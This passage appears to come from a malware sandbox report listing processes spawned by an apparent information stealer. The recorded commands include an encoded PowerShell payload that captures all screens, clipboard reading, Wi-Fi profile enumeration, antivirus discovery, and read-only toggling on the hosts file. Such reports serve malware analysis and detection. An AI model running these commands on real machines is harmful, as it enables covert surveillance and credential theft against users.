                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tree /A /F
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b7570000
                                                                                                                                                                                                                                                                  File size:20'992 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:55
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:56
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:57
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:58
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:systeminfo
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6f3370000
                                                                                                                                                                                                                                                                  File size:110'080 bytes
                                                                                                                                                                                                                                                                  MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:59
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:netsh wlan show profile
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7d16d0000
                                                                                                                                                                                                                                                                  File size:96'768 bytes
                                                                                                                                                                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:60
                                                                                                                                                                                                                                                                  Start time:03:22:11
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7403e0000
                                                                                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:61
                                                                                                                                                                                                                                                                  Start time:03:22:12
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6b4290000
                                                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:62
                                                                                                                                                                                                                                                                  Start time:03:22:12
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:63
                                                                                                                                                                                                                                                                  Start time:03:22:12
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b5c80000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:64
                                                                                                                                                                                                                                                                  Start time:03:22:13
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:65
                                                                                                                                                                                                                                                                  Start time:03:22:13
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:66
                                                                                                                                                                                                                                                                  Start time:03:22:13
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6995b0000
                                                                                                                                                                                                                                                                  File size:23'040 bytes
                                                                                                                                                                                                                                                                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:67
                                                                                                                                                                                                                                                                  Start time:03:22:15
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6b78b0000
                                                                                                                                                                                                                                                                  File size:2'759'232 bytes
                                                                                                                                                                                                                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:68
                                                                                                                                                                                                                                                                  Start time:03:22:15
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:69
                                                                                                                                                                                                                                                                  Start time:03:22:15
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:70
                                                                                                                                                                                                                                                                  Start time:03:22:15
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
